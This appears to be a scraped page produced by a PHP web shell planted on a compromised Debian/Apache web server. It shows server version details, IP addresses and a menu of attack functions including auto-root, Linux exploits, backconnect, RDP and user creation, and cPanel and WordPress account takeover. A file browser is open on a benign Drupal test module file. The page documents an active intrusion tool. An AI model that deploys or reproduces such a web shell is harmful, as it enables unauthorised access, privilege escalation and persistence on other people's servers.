Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.218.119.140
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
openid /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
openid_test.info
292
B
-rw-r--r--
openid_test.install
443
B
-rw-r--r--
openid_test.module
14.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : openid_test.install
<?php /** * @file * Install, update and uninstall functions for the openid_test module. */ /** * Implements hook_install(). */ function openid_test_install() { module_load_include('inc', 'openid'); // Generate a MAC key (Message Authentication Code) used for signing messages. // The variable is base64-encoded, because variables cannot contain non-UTF-8 // data. variable_set('openid_test_mac_key', drupal_random_key(20)); }
Close